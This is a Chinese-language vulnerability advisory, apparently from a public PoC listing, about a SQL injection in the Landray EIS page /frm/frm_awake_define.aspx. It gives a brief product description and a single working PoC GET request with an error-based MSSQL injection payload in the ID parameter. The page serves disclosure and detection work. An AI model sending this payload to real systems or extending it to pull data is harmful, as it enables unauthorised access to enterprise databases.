蓝凌EIS /frm/frm_awake_define.aspx SQL 注入漏洞

2026-05-09 蓝凌EIS PoC Public

Description

蓝凌EIS(Landray EIS)是深圳市蓝凌软件股份有限公司推出的一款企业级智慧协同平台,是大型企业数字化转型的首选平台。该产品采用多层架构设计,涵盖协同办公、流程管理、知识管理、财务管理等核心业务模块,支持多组织、多账簿的复杂业务场景,广泛应用于制造、能源、交通、金融等国民经济重点行业。蓝凌EIS /frm/frm_awake_define.aspx 接口存在SQL注入漏洞,攻击者可获取数据库敏感信息。

PoC

GET /frm/frm_awake_define.aspx?ID=1%20and%201=sys.fn_sqlvarbasetostr(HashBytes('MD5','2257'))--+ HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities